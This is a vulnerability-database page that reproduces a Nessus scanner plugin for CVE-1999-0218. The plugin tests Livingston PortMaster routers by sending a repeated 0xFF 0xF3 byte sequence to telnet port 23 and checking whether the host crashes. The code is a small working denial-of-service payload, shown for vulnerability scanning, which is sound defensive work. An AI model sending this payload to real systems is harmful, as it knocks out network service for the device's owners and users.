Lucene search
K

Livingston PortMaster ComOS Malformed Packet Remote DoS

🗓️ 22 Aug 1999 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 35 Views

Remote Livingston PortMaster ComOS vulnerable to denial of service via malformed packets.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-1999-0218
29 Sep 199904:00
cve
Cvelist
CVE-1999-0218
29 Sep 199904:00
cvelist
EUVD
EUVD-1999-0218
7 Oct 202500:30
euvd
NVD
CVE-1999-0218
1 Oct 199504:00
nvd
Positive Technologies
PT-1995-1013 · Livingston · Livingston Portmaster
1 Oct 199500:00
ptsecurity
RedhatCVE
CVE-1999-0218
21 May 202518:07
redhatcve
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10182);
 script_version("1.25");
 script_cvs_date("Date: 2018/07/27 12:15:50");

 script_cve_id("CVE-1999-0218");
 script_bugtraq_id(2225);

 script_name(english:"Livingston PortMaster ComOS Malformed Packet Remote DoS");
 script_summary(english:"Crashes the remote portmaster");

 script_set_attribute(attribute:"synopsis", value:"The remote server is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote Livingston portmaster by
overflowing its buffers by sending several times the two chars :

 0xFF 0xF3

An attacker may use this flaw to prevent you to use your internet
access.");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1995/09/10");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/08/22");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");
 script_require_ports(23);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

crp = raw_string(0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3);

port = 23;

if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  #
  # Send the crap ten times
  #

  start_denial();
  send(socket:soc, data:crp, length:10) x 10;

  close(soc);

  alive = end_denial();

  if(!alive){
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(0);
                }
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation